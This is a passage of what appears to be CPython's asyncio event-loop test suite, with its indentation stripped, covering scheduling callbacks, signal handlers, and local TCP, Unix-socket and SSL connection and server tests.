from test.test_asyncio import utils as test_utils
from test import support
from test.support import socket_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
        # just in case we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.run_until_complete(
self.loop.shutdown_default_executor())
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = socket_helper.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=support.LOOPBACK_TIMEOUT)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@socket_helper.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = socket_helper.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
